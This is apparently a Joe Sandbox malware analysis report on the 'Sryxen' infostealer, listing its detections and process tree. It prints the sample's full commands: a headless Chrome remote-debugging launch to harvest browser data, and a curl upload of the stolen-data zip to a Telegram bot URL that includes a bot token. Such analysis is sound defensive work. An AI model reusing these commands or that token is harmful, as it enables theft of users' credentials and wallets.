Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Sryxen-Built.exe

Overview

General Information

Sample name:Sryxen-Built.exe
Analysis ID:1632714
MD5:839dabb2304f06d4c823907cd3879a6c
SHA1:2adc26c5defb4817242701c3632beb94af9daa56
SHA256:cabcfa250019a3bec5927a8bf657c81a4c6d506d6a1b1afdd124d4ade91db389
Tags:exeuser-BastianHein
Infos:

Detection

Score:84
Range:0 - 100
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
AI detected suspicious PE digital signature
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • Sryxen-Built.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\Sryxen-Built.exe" MD5: 839DABB2304F06D4C823907CD3879A6C)
    • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 8044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 6924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --no-pre-read-main-dll --field-trial-handle=2044,i,1239830082047831233,17937077768057829185,262144 --disable-features=PaintHolding --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2500 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • msedge.exe (PID: 8112 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7644 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2112,i,15007962788888816563,4960252785444406782,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • powershell.exe (PID: 8992 cmdline: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 9012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 9004 cmdline: curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 9036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 7488 cmdline: C:\Windows\system32\WerFault.exe -u -p 7348 -s 856 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • msedge.exe (PID: 528 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7772 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8784 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6340 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8816 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6560 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 3444 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7000 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 3108 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7000 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • msedge.exe (PID: 4104 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6344 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 336 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3368 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2092,i,268919721594276684,6312096580971565461,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 4928 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2260 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2052,i,6752636974988034322,17708656779778021828,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 7348, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, ProcessId: 8044, ProcessName: chrome.exe
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 7348, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", ProcessId: 8992, ProcessName: powershell.exe
Sigma detected: Browser Execution In Headless Mode
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 7348, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, ProcessId: 8044, ProcessName: chrome.exe
Sigma detected: Browser Started with Remote Debugging
Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 7348, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, ProcessId: 8044, ProcessName: chrome.exe
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 7348, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", ProcessId: 8992, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument, CommandLine: curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 7348, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument, ProcessId: 9004, ProcessName: curl.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 7348, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", ProcessId: 8992, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B4F9EA0 std::_Fac_node::_Fac_node,htons,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,send,0_2_00007FF67B4F9EA0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B5091F0 Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,CryptUnprotectData,LocalFree,0_2_00007FF67B5091F0
Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: Sryxen-Built.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: Sryxen-Built.exe, 00000000.00000003.1227446361.0000018D46219000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243118243.0000018D4621E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228745562.0000018D4621A000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Comms\Unistore\datap.pdb\* source: Sryxen-Built.exe, 00000000.00000003.1309358098.0000018D46284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb{ source: Sryxen-Built.exe, 00000000.00000003.1236123884.0000018D46209000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User Data\Local Stateate source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2ta source: Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46202000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250735027.0000018D461FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbpi0112724rsegmnoittet-es.filesOW source: Sryxen-Built.exe, 00000000.00000003.1236441733.0000018D46283000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236771454.0000018D46284000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1239318698.0000018D46284000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1238196537.0000018D46284000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234646624.0000018D4627D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831cal State source: Sryxen-Built.exe, 00000000.00000003.1243135675.0000018D46216000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243405669.0000018D46217000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local StateStateA source: Sryxen-Built.exe, 00000000.00000003.1231839076.0000018D4621B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1232355664.0000018D4621C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2*e source: Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbe source: Sryxen-Built.exe, 00000000.00000003.1243118243.0000018D4621E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831al Statev source: Sryxen-Built.exe, 00000000.00000003.1236897944.0000018D46271000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46271000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831es\ESEatez source: Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831okiesate source: Sryxen-Built.exe, 00000000.00000003.1247609444.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User Data\Local StateeeA source: Sryxen-Built.exe, 00000000.00000003.1236154256.0000018D4621B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236123884.0000018D46209000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbtate source: Sryxen-Built.exe, 00000000.00000003.1240197390.0000018D46217000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236123884.0000018D46209000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbt source: Sryxen-Built.exe, 00000000.00000003.1231270289.0000018D46214000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb| source: Sryxen-Built.exe, 00000000.00000003.1227446361.0000018D46219000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statecal State source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*s\* source: Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46202000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250735027.0000018D461FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831C\Temp\* source: Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbre\idb\3870112724rsegmnoittet-es.files\* source: Sryxen-Built.exe, 00000000.00000003.1243135675.0000018D46216000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2ta\* source: Sryxen-Built.exe, 00000000.00000003.1236897944.0000018D46271000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46271000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User DatataateE source: Sryxen-Built.exe, 00000000.00000003.1238559982.0000018D46272000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236897944.0000018D46271000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46271000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User Data\Local Statete source: Sryxen-Built.exe, 00000000.00000003.1228626688.0000018D46252000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tate source: Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*e\*s source: Sryxen-Built.exe, 00000000.00000003.1242868327.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243044695.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC23 source: Sryxen-Built.exe, 00000000.00000003.1227554283.0000018D46269000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227428811.0000018D46264000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227402785.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227568090.0000018D4626D000.00000004.00000020.00020000.00000000.sdmp
